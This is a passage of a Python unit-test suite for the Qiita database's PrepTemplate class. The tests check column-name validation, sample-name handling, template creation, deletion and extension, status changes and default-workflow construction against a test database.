pd.DataFrame.from_dict(metadata_dict, orient='index', dtype=str)\n\n obs.sort_index(axis=0, inplace=True)\n obs.sort_index(axis=1, inplace=True)\n exp.sort_index(axis=0, inplace=True)\n exp.sort_index(axis=1, inplace=True)\n\n assert_frame_equal(obs, exp, check_like=True)\n\n def test_clean_validate_template_no_forbidden_words1(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'sampleid'}, inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_no_forbidden_words2(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'linkerprimersequence'},\n inplace=True)\n raised = False\n try:\n PT._clean_validate_template(self.metadata, 2)\n except qdb.exceptions.QiitaDBColumnError:\n raised = True\n self.assertFalse(raised, \"Exception raised\")\n\n def test_clean_validate_template_no_pgsql_reserved_words(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'select'}, inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_no_qiime2_reserved_words(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n 
self.metadata.rename(columns={'center_name': 'featureid'},\n inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_no_invalid_chars(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'taxon id'}, inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_no_invalid_chars2(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n self.metadata.rename(columns={'center_name': 'bla.'}, inplace=True)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_get_category(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n obs = pt.get_category('primer')\n exp = {\n '1.SKB2.640194': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM4.640180': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB3.640195': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB6.640176': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD6.640190': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM6.640187': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD9.640182': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM8.640201': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM2.640199': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD2.640178': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB7.640196': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD4.640185': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB8.640193': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM3.640197': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD5.640186': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB1.640202': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM1.640183': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD1.640179': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD3.640198': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB5.640181': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB4.640189': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKB9.640200': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM9.640192': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD8.640184': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM5.640177': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKM7.640188': 'GTGCCAGCMGCCGCGGTAA',\n '1.SKD7.640191': 'GTGCCAGCMGCCGCGGTAA'}\n self.assertEqual(obs, exp)\n\n def test_get_category_no_exists(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n pt.get_category('DOESNOTEXIST')\n\n def test_create_duplicate_header(self):\n \"\"\"Create raises an error when duplicate headers are present\"\"\"\n self.metadata['STR_COLUMN'] = pd.Series(['', '', ''],\n index=self.metadata.index)\n with self.assertRaises(qdb.exceptions.QiitaDBDuplicateHeaderError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n\n def test_create_bad_sample_names(self):\n # set a horrible list of sample names\n self.metadata.index = ['o()xxxx[{::::::::>', 'sample.1', 'sample.3']\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n\n def test_create_unknown_sample_names(self):\n # set two real and one fake sample name\n self.metadata_dict['NOTREAL'] = self.metadata_dict['SKB7.640196']\n del self.metadata_dict['SKB7.640196']\n self.metadata = pd.DataFrame.from_dict(self.metadata_dict,\n orient='index', dtype=str)\n # Test error raised and correct error given\n with self.assertRaises(qdb.exceptions.QiitaDBExecutionError) as err:\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.assertEqual(\n str(err.exception),\n 'Samples found 
in prep template but not sample template: 1.NOTREAL'\n )\n\n def test_create_shorter_prep_template(self):\n # remove one sample so not all samples in the prep template\n del self.metadata_dict['SKB7.640196']\n self.metadata = pd.DataFrame.from_dict(self.metadata_dict,\n orient='index', dtype=str)\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT sample_id\n FROM qiita.prep_%d\n WHERE sample_id != '%s'\"\"\" % (pt.id, self.QCN)\n qdb.sql_connection.TRN.add(sql)\n obs = qdb.sql_connection.TRN.execute_fetchindex()\n exp = [['1.SKB8.640193'], ['1.SKD8.640184']]\n self.assertEqual(obs, exp)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def _common_creation_checks(self, pt, fp_count, name):\n self.assertEqual(pt.name, name)\n self.assertEqual(pt.data_type(), self.data_type)\n self.assertEqual(pt.data_type(ret_id=True), self.data_type_id)\n self.assertEqual(pt.artifact, None)\n self.assertEqual(pt.investigation_type, 'Amplicon')\n self.assertEqual(pt.study_id, self.test_study.id)\n self.assertEqual(pt.status, \"sandbox\")\n exp_sample_ids = {'%s.SKB8.640193' % self.test_study.id,\n '%s.SKD8.640184' % self.test_study.id,\n '%s.SKB7.640196' % self.test_study.id}\n self.assertEqual(pt._get_sample_ids(), exp_sample_ids)\n self.assertEqual(len(pt), 3)\n exp_categories = {'str_column', 'ebi_submission_accession',\n 'run_prefix', 'barcode', 'primer', 'platform',\n 'instrument_model', 'experiment_design_description',\n 'library_construction_protocol', 'center_name',\n 'center_project_name', 'insdc_nulls', 'emp_status'}\n self.assertCountEqual(pt.categories, exp_categories)\n exp_dict = {\n '%s.SKB7.640196' % self.test_study.id: {\n 'barcode': 'CCTCTGAGAGCT',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L002_sequences',\n 'str_column': 'Value for sample 3',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': 'not applicable',\n 'emp_status': 'EMP'},\n '%s.SKB8.640193' % self.test_study.id: {\n 'barcode': 'GTCCGCAAGTTA',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 1',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': '3.6',\n 'emp_status': 'EMP'},\n '%s.SKD8.640184' % self.test_study.id: {\n 'barcode': 'CGTAGAGCTCTC',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 2',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': 'not applicable',\n 'emp_status': 'EMP'}\n }\n for s_id in exp_sample_ids:\n self.assertEqual(pt[s_id]._to_dict(), exp_dict[s_id])\n\n # prep files have been created\n filepaths = pt.get_filepaths()\n self.assertEqual(len(filepaths), 1)\n\n def test_validate_restrictions(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n pt = 
PT.create(self.metadata, self.test_study, self.data_type,\n name='New Prep For Test')\n success, message = pt.validate_restrictions()\n self.assertEqual(message, 'prep %d is missing columns \"target_gene, '\n 'target_subfragment\"' % pt.id)\n self.assertFalse(success)\n\n metadata = self.metadata.copy()\n metadata['target_gene'] = 'Should Warn'\n metadata['target_subfragment'] = 'V4'\n pt.extend(metadata)\n success, message = pt.validate_restrictions()\n self.assertEqual(message, 'prep %d has invalid values: \"Should '\n 'Warn\", valid values are: \"16S rRNA, 18S rRNA, '\n 'ITS1/2, LSU\"' % pt.id)\n self.assertFalse(success)\n\n metadata['target_gene'] = '16S rRNA'\n # as we are testing the update functionality of a prep info file, we\n # can also test that the timestamps are working correctly\n current_ct = pt.creation_timestamp\n current_mt = pt.modification_timestamp\n self.assertTrue(current_ct < current_mt)\n pt.update(metadata)\n self.assertEqual(current_ct, pt.creation_timestamp)\n self.assertTrue(current_mt < pt.modification_timestamp)\n success, message = pt.validate_restrictions()\n success, message = pt.validate_restrictions()\n self.assertEqual(message, '')\n self.assertTrue(success)\n\n # cleaning\n PT.delete(pt.id)\n\n def test_create(self):\n \"\"\"Creates a new PrepTemplate\"\"\"\n fp_count = qdb.util.get_count('qiita.filepath')\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type,\n name='New Prep For Test')\n self._common_creation_checks(pt, fp_count, \"New Prep For Test\")\n # checking that the creation and modification timestamps are within\n # 2 seconds of current time\n dsecs = (datetime.now() - pt.modification_timestamp).total_seconds()\n self.assertTrue(dsecs < 2)\n dsecs = (datetime.now() - pt.creation_timestamp).total_seconds()\n self.assertTrue(dsecs < 2)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_create_already_prefixed_samples(self):\n \"\"\"Creates a new PrepTemplate\"\"\"\n fp_count = qdb.util.get_count('qiita.filepath')\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata_prefixed, self.test_study, self.data_type)\n self._common_creation_checks(pt, fp_count,\n \"Prep information %s\" % pt.id)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_empty_prep(self):\n \"\"\"Creates a new PrepTemplate\"\"\"\n metadata = pd.DataFrame.from_dict(\n {'SKB8.640193': {}, 'SKD8.640184': {}}, orient='index', dtype=str)\n with self.assertRaises(ValueError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n metadata, self.test_study, self.data_type)\n\n def test_generate_files(self):\n fp_count = qdb.util.get_count(\"qiita.filepath\")\n self.tester.generate_files()\n obs = qdb.util.get_count(\"qiita.filepath\")\n # We just make sure that the count has been increased by 1, since\n # the contents of the files have been tested elsewhere.\n self.assertEqual(obs, fp_count + 1)\n\n def test_create_data_type_id(self):\n \"\"\"Creates a new PrepTemplate passing the data_type_id\"\"\"\n fp_count = qdb.util.get_count('qiita.filepath')\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n self._common_creation_checks(pt, fp_count,\n \"Prep information %s\" % pt.id)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_create_warning(self):\n \"\"\"Warns if a required columns is missing for a given 
functionality\n \"\"\"\n del self.metadata['barcode']\n pt = npt.assert_warns(\n qdb.exceptions.QiitaDBWarning,\n qdb.metadata_template.prep_template.PrepTemplate.create,\n self.metadata, self.test_study, self.data_type)\n\n self.assertEqual(pt.data_type(), self.data_type)\n self.assertEqual(pt.data_type(ret_id=True), self.data_type_id)\n self.assertEqual(pt.artifact, None)\n self.assertEqual(pt.investigation_type, 'Amplicon')\n self.assertEqual(pt.study_id, self.test_study.id)\n self.assertEqual(pt.status, 'sandbox')\n exp_sample_ids = {'%s.SKB8.640193' % self.test_study.id,\n '%s.SKD8.640184' % self.test_study.id,\n '%s.SKB7.640196' % self.test_study.id}\n self.assertEqual(pt._get_sample_ids(), exp_sample_ids)\n self.assertEqual(len(pt), 3)\n exp_categories = {'str_column', 'ebi_submission_accession',\n 'run_prefix', 'primer', 'platform', 'insdc_nulls',\n 'instrument_model', 'experiment_design_description',\n 'library_construction_protocol', 'center_name',\n 'center_project_name', 'emp_status'}\n self.assertCountEqual(pt.categories, exp_categories)\n exp_dict = {\n '%s.SKB7.640196' % self.test_study.id: {\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L002_sequences',\n 'str_column': 'Value for sample 3',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': 'not applicable',\n 'emp_status': 'EMP'},\n '%s.SKB8.640193' % self.test_study.id: {\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 1',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': '3.6',\n 'emp_status': 'EMP'},\n '%s.SKD8.640184' % self.test_study.id: {\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 2',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'insdc_nulls': 'not applicable',\n 'emp_status': 'EMP'}\n }\n for s_id in exp_sample_ids:\n self.assertEqual(pt[s_id]._to_dict(), exp_dict[s_id])\n\n # prep files have been created\n filepaths = pt.get_filepaths()\n self.assertEqual(len(filepaths), 1)\n\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_create_investigation_type_error(self):\n \"\"\"Create raises an error if the investigation_type does not exists\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id,\n 'Not a term')\n\n def test_create_duplicated_column_error(self):\n \"\"\"Create raises an error if the prep has a duplicated column name\"\"\"\n self.metadata['season_environment'] = self.metadata['primer']\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n\n def test_delete_error(self):\n \"\"\"Try to delete a prep template that already has preprocessed data\"\"\"\n with 
self.assertRaises(qdb.exceptions.QiitaDBExecutionError):\n qdb.metadata_template.prep_template.PrepTemplate.delete(1)\n\n def test_delete_unkonwn_id_error(self):\n \"\"\"Try to delete a non existent prep template\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBUnknownIDError):\n qdb.metadata_template.prep_template.PrepTemplate.delete(30000)\n\n def test_delete_error_raw_data(self):\n \"\"\"Try to delete a prep template with a raw data attached to id\"\"\"\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n artifact = qdb.artifact.Artifact.create(\n self.filepaths, \"FASTQ\", prep_template=pt)\n\n with self.assertRaises(qdb.exceptions.QiitaDBExecutionError):\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n # cleaning\n qdb.artifact.Artifact.delete(artifact.id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_delete(self):\n \"\"\"Deletes prep template 2\"\"\"\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n exp = []\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_template\n WHERE prep_template_id = %s\"\"\"\n qdb.sql_connection.TRN.add(sql, [pt.id])\n obs = qdb.sql_connection.TRN.execute_fetchindex()\n self.assertEqual(obs, exp)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.study_prep_template\n WHERE prep_template_id = %s\"\"\"\n qdb.sql_connection.TRN.add(sql, [pt.id])\n obs = qdb.sql_connection.TRN.execute_fetchindex()\n self.assertEqual(obs, exp)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_template_sample\n WHERE prep_template_id = %s\"\"\"\n qdb.sql_connection.TRN.add(sql, [pt.id])\n obs = qdb.sql_connection.TRN.execute_fetchindex()\n self.assertEqual(obs, exp)\n\n with self.assertRaises(ValueError):\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_%d\"\"\" % pt.id\n qdb.sql_connection.TRN.add(sql)\n\n def test_setitem(self):\n \"\"\"setitem raises an error (currently not allowed)\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBNotImplementedError):\n self.tester['1.SKM7.640188'] = \\\n qdb.metadata_template.prep_template.PrepSample('1.SKM7.640188',\n self.tester)\n\n def test_delitem(self):\n \"\"\"delitem raises an error (currently not allowed)\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBNotImplementedError):\n del self.tester['1.SKM7.640188']\n\n def test_to_file(self):\n \"\"\"to file writes a tab delimited file with all the metadata\"\"\"\n fd, fp = mkstemp()\n close(fd)\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n pt.to_file(fp)\n self._clean_up_files.append(fp)\n with open(fp, newline=None) as f:\n obs = f.read()\n\n self.assertEqual(obs, EXP_PREP_TEMPLATE.format(pt.id))\n\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_investigation_type_setter(self):\n \"\"\"Able to update the investigation type\"\"\"\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n self.assertEqual(pt.investigation_type, 'Amplicon')\n pt.investigation_type = \"Other\"\n self.assertEqual(pt.investigation_type, 'Other')\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n pt.investigation_type = \"should fail\"\n\n # cleaning\n 
qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_investigation_type_instance_setter(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n pt.investigation_type = 'RNA-Seq'\n self.assertEqual(pt.investigation_type, 'RNA-Seq')\n\n def test_deprecated_setter(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertFalse(pt.deprecated)\n pt.deprecated = True\n self.assertTrue(pt.deprecated)\n pt.deprecated = False\n self.assertFalse(pt.deprecated)\n\n def test_status(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertEqual(pt.status, 'private')\n\n # Check that changing the status of the processed data, the status\n # of the prep template changes\n a = qdb.artifact.Artifact(1)\n a.visibility = 'public'\n self.assertEqual(pt.status, 'public')\n\n # New prep templates have the status to sandbox because there is no\n # processed data associated with them\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n self.assertEqual(pt.status, 'sandbox')\n\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_update_category(self):\n with self.assertRaises(qdb.exceptions.QiitaDBUnknownIDError):\n self.tester.update_category('barcode', {\"foo\": \"bar\"})\n\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n self.tester.update_category('missing column',\n {'1.SKB7.640196': 'bar'})\n\n neg_test = self.tester['1.SKB7.640196']['barcode']\n mapping = {'1.SKB8.640193': 'AAAAAAAAAAAA',\n '1.SKD8.640184': 'CCCCCCCCCCCC'}\n\n self.tester.update_category('barcode', mapping)\n\n self.assertEqual(self.tester['1.SKB7.640196']['barcode'],\n neg_test)\n self.assertEqual(self.tester['1.SKB8.640193']['barcode'],\n 'AAAAAAAAAAAA')\n self.assertEqual(self.tester['1.SKD8.640184']['barcode'],\n 'CCCCCCCCCCCC')\n\n neg_test = self.tester['1.SKB7.640196']['center_name']\n mapping = {'1.SKB8.640193': 'FOO',\n '1.SKD8.640184': 'BAR'}\n\n self.tester.update_category('center_name', mapping)\n\n self.assertEqual(self.tester['1.SKB7.640196']['center_name'], neg_test)\n self.assertEqual(self.tester['1.SKB8.640193']['center_name'], 'FOO')\n self.assertEqual(self.tester['1.SKD8.640184']['center_name'], 'BAR')\n\n def test_qiime_map_fp(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n exp = join(qdb.util.get_mountpoint('templates')[0][1],\n '1_prep_1_qiime_[0-9]*-[0-9]*.txt')\n self.assertRegex(pt.qiime_map_fp, exp)\n\n def test_check_restrictions(self):\n obs = self.tester.check_restrictions(\n [qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS['EBI']])\n self.assertEqual(obs, set())\n\n del self.metadata['primer']\n pt = npt.assert_warns(\n qdb.exceptions.QiitaDBWarning,\n qdb.metadata_template.prep_template.PrepTemplate.create,\n self.metadata, self.test_study, self.data_type)\n\n obs = pt.check_restrictions(\n [qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS['EBI'],\n qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS_TARGET_GENE[\n 'demultiplex']])\n self.assertEqual(obs, set())\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_artifact(self):\n \"\"\"Returns the artifact associated with the prep template\"\"\"\n self.assertEqual(self.tester.artifact, qdb.artifact.Artifact(1))\n\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type_id)\n self.assertEqual(pt.artifact, None)\n # cleaning\n 
qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_artifact_setter_error(self):\n a = qdb.artifact.Artifact(1)\n with self.assertRaises(qdb.exceptions.QiitaDBError):\n self.tester.artifact = a\n\n def test_artifact_setter(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, '16S')\n self.assertEqual(pt.artifact, None)\n artifact = qdb.artifact.Artifact.create(\n self.filepaths, \"FASTQ\", prep_template=pt)\n self.assertEqual(pt.artifact, artifact)\n\n # here we can test that we can properly create a workflow but we are\n # going to add lot more steps to make it more complex by adding a\n # couple of new scenarios\n # 1/2. adds a new path that should be kept separate all the way; this\n # is to emulate what happens with different trimming (different\n # default parameter) and deblur (same for each of the previous\n # steps)\n sql = \"\"\"\n INSERT INTO qiita.default_workflow_node (\n default_workflow_id, default_parameter_set_id)\n VALUES (1, 2), (1, 10);\n INSERT INTO qiita.default_workflow_edge (\n parent_id, child_id)\n VALUES (7, 8);\n INSERT INTO qiita.default_workflow_edge_connections (\n default_workflow_edge_id, parent_output_id, child_input_id)\n VALUES (4, 1, 3)\"\"\"\n qdb.sql_connection.perform_as_transaction(sql)\n # 2/2. adds a new path that should be kept together and then separate;\n # this is to simulate what happens with MTX/WGS processing, one\n # single QC step (together) and 2 separete profilers\n sql = \"\"\"\n INSERT INTO qiita.default_parameter_set (\n command_id, parameter_set_name, parameter_set)\n VALUES (3, '100%',\n ('{\"reference\":1,\"sortmerna_e_value\":1,'\n || '\"sortmerna_max_pos\":'\n || '10000,\"similarity\":1.0,\"sortmerna_coverage\":1.00,'\n || '\"threads\":1}')::json);\n INSERT INTO qiita.default_workflow_node (\n default_workflow_id, default_parameter_set_id)\n VALUES (1, 17);\n INSERT INTO qiita.default_workflow_edge (\n parent_id, child_id)\n VALUES (7, 9);\n INSERT INTO qiita.default_workflow_edge_connections (\n default_workflow_edge_id, parent_output_id, child_input_id)\n VALUES (5, 1, 3)\n \"\"\"\n qdb.sql_connection.perform_as_transaction(sql)\n # Finally, we need to \"activate\" the merging scheme values of the\n # commands so they are actually different:\n # 31->'Pick closed-reference OTUs', 6->'Split libraries FASTQ'\n sql = \"\"\"\n UPDATE qiita.command_parameter\n SET check_biom_merge = true\n WHERE command_parameter_id IN (31, 6)\"\"\"\n qdb.sql_connection.perform_as_transaction(sql)\n\n wk = pt.add_default_workflow(qdb.user.User('test@foo.bar'))\n self.assertEqual(len(wk.graph.nodes), 5)\n self.assertEqual(len(wk.graph.edges), 3)\n self.assertCountEqual(\n [x.command.name for x in wk.graph.nodes],\n # we should have 2 split libraries and 3 close reference\n ['Split libraries FASTQ', 'Split libraries FASTQ',\n 'Pick closed-reference OTUs', 'Pick closed-reference OTUs',\n 'Pick closed-reference OTUs'])\n\n # now let's try to generate again and it should fail cause the jobs\n # are alrady created\n with self.assertRaisesRegex(ValueError, \"Cannot create job because \"\n \"the parameters are the same as jobs\"):\n pt.add_default_workflow(qdb.user.User('test@foo.bar'))\n\n # now let's test that an error is raised when there is no valid initial\n # input data; this moves the data type from FASTQ to taxa_summary for\n # the default_workflow_id = 1\n qdb.sql_connection.perform_as_transaction(\n 'UPDATE qiita.default_workflow SET artifact_type_id = 10 WHERE '\n 
'default_workflow_id = 1')\n with self.assertRaisesRegex(ValueError, 'This preparation data type: '\n '\"16S\" and/or artifact type \"FASTQ\" does '\n 'not have valid workflows'):\n pt.add_default_workflow(qdb.user.User('test@foo.bar'))\n\n # cleaning\n qdb.artifact.Artifact.delete(artifact.id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_can_be_updated_on_new(self):\n \"\"\"test if the template can be updated\"\"\"\n # you can update a newly created pt\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.assertTrue(pt.can_be_updated({'barcode'}))\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_extend_add_samples(self):\n \"\"\"extend correctly works adding new samples\"\"\"\n md_2_samples = self.metadata.loc[('SKB8.640193', 'SKD8.640184'), :]\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n md_2_samples, self.test_study, self.data_type)\n\n npt.assert_warns(\n qdb.exceptions.QiitaDBWarning, pt.extend, self.metadata)\n\n exp_sample_ids = {'%s.SKB8.640193' % self.test_study.id,\n '%s.SKD8.640184' % self.test_study.id,\n '%s.SKB7.640196' % self.test_study.id}\n self.assertEqual(pt._get_sample_ids(), exp_sample_ids)\n\n # test error due to max number of samples during extend\n cmax = qdb.util.max_preparation_samples()\n sql = 'UPDATE settings SET max_preparation_samples = %s'\n qdb.sql_connection.perform_as_transaction(sql, [3])\n df = pd.DataFrame.from_dict(\n {'SKB1.640202': {'barcode': 'CCTCTGAGAGCT'}},\n orient='index', dtype=str)\n with self.assertRaisesRegex(ValueError, \"4 exceeds the max allowed \"\n \"number of samples: 3\"):\n pt.extend(df)\n\n # now test creation\n PT = qdb.metadata_template.prep_template.PrepTemplate\n qdb.sql_connection.perform_as_transaction(sql, [2])\n with self.assertRaisesRegex(ValueError, \"3 exceeds the max allowed \"\n \"number of samples: 2\"):\n PT.create(self.metadata, self.test_study, self.data_type)\n\n # cleaning\n qdb.sql_connection.perform_as_transaction(sql, [cmax])\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_extend_add_samples_error(self):\n \"\"\"extend fails adding samples to an already preprocessed template\"\"\"\n df = pd.DataFrame.from_dict(\n {'new_sample': {'barcode': 'CCTCTGAGAGCT'}},\n orient='index', dtype=str)\n with self.assertRaises(qdb.exceptions.QiitaDBError):\n qdb.metadata_template.prep_template.PrepTemplate(1).extend(df)\n\n def test_extend_add_cols(self):\n \"\"\"extend correctly adds a new columns\"\"\"\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.metadata['new_col'] = pd.Series(['val1', 'val2', 'val3'],\n index=self.metadata.index)\n\n npt.assert_warns(\n qdb.exceptions.QiitaDBWarning, pt.extend, self.metadata)\n\n with qdb.sql_connection.TRN:\n sql = \"\"\"SELECT *\n FROM qiita.prep_{0}\n WHERE sample_id != '{1}'\"\"\".format(pt.id, self.QCN)\n qdb.sql_connection.TRN.add(sql)\n obs = dict(qdb.sql_connection.TRN.execute_fetchindex())\n exp = {'1.SKB7.640196': {\n 'barcode': 'CCTCTGAGAGCT',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L002_sequences',\n 'str_column': 'Value for sample 3',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 
